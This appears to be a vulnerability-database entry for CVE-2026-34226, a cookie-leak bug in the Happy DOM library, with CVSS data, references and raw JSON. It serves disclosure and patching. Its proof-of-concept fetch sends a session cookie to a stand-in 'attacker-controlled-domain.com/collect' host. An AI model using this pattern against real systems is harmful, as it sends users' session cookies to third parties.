Security Vulnerability Report
CVE-2026-34226 CVSS 7.5 HIGH

CVE-2026-34226

Published: 2026-03-27 22:16:23
Last Modified: 2026-04-01 13:26:49

Description

Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Versions prior to 20.8.9 may attach cookies from the current page origin (`window.location`) instead of the request target URL when `fetch(..., { credentials: "include" })` is used. This can leak cookies from origin A to destination B. Version 20.8.9 fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:capricorn86:happy_dom:*:*:*:*:*:nodejs:*:* - VULNERABLE
Happy DOM < 20.8.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
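// This PoC demonstrates the cookie leakage in Happy DOM < 20.8.9
// It sets a cookie for the current origin and then makes a fetch request
// to an external origin with credentials: 'include'.
const { Window } = require('happy-dom');

const window = new Window();

// 1. Simulate the current environment (Origin A) having a sensitive cookie
window.document.cookie = 'session_id=super_secret_token; Path=/';
console.log('Cookie on current origin:', window.document.cookie);

// 2. Wrap the fetch function to log the outgoing request.
// In a real attack scenario, this request goes to an attacker-controlled server (Origin B)
// NOTE(review): the Cookie header is presumably assembled inside Happy DOM's own
// fetch implementation (the referenced patch touches FetchRequestHeaderUtility.ts),
// so it is not expected to show up in `options` here — this wrapper can only
// observe the target URL. Confirming whether the cookie was attached requires
// inspecting the request as received on the destination side.
const originalFetch = window.fetch;
window.fetch = async (url, options) => {
  console.log(`[PoC] Sending request to: ${url}`);
  // `originalFetch` is a method taken off the Window instance; invoke it with
  // `window` as `this` so the detached call does not lose its binding.
  return originalFetch.call(window, url, options);
};

// 3. Trigger the vulnerable behavior
// The Happy DOM bug causes cookies from Origin A to be sent to Origin B
window
  .fetch('http://attacker-controlled-domain.com/collect', {
    method: 'GET',
    credentials: 'include',
  })
  .then(() => {
    console.log('Request completed. Cookie potentially leaked to external domain.');
  })
  .catch((err) => {
    console.error('Request failed:', err);
  });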

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34226", "sourceIdentifier": "[email protected]", "published": "2026-03-27T22:16:23.113", "lastModified": "2026-04-01T13:26:49.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Versions prior to 20.8.9 may attach cookies from the current page origin (`window.location`) instead of the request target URL when `fetch(..., { credentials: \"include\" })` is used. This can leak cookies from origin A to destination B. Version 20.8.9 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}, {"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:capricorn86:happy_dom:*:*:*:*:*:nodejs:*:*", "versionEndExcluding": "20.8.9", "matchCriteriaId": "F247E3AB-3479-46B8-8FAE-703193780558"}]}]}], "references": [{"url": "https://github.com/capricorn86/happy-dom/blob/f8d8cad41e9722fab9eefb9dfb3cca696462e908/packages/happy-dom/src/fetch/utilities/FetchRequestHeaderUtility.ts", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/capricorn86/happy-dom/commit/68324c21d7b98f53f7bb5a7b3e185bda7106e751", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/capricorn86/happy-dom/pull/2117", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/capricorn86/happy-dom/releases/tag/v20.8.9", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-w4gp-fjgq-3q4g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}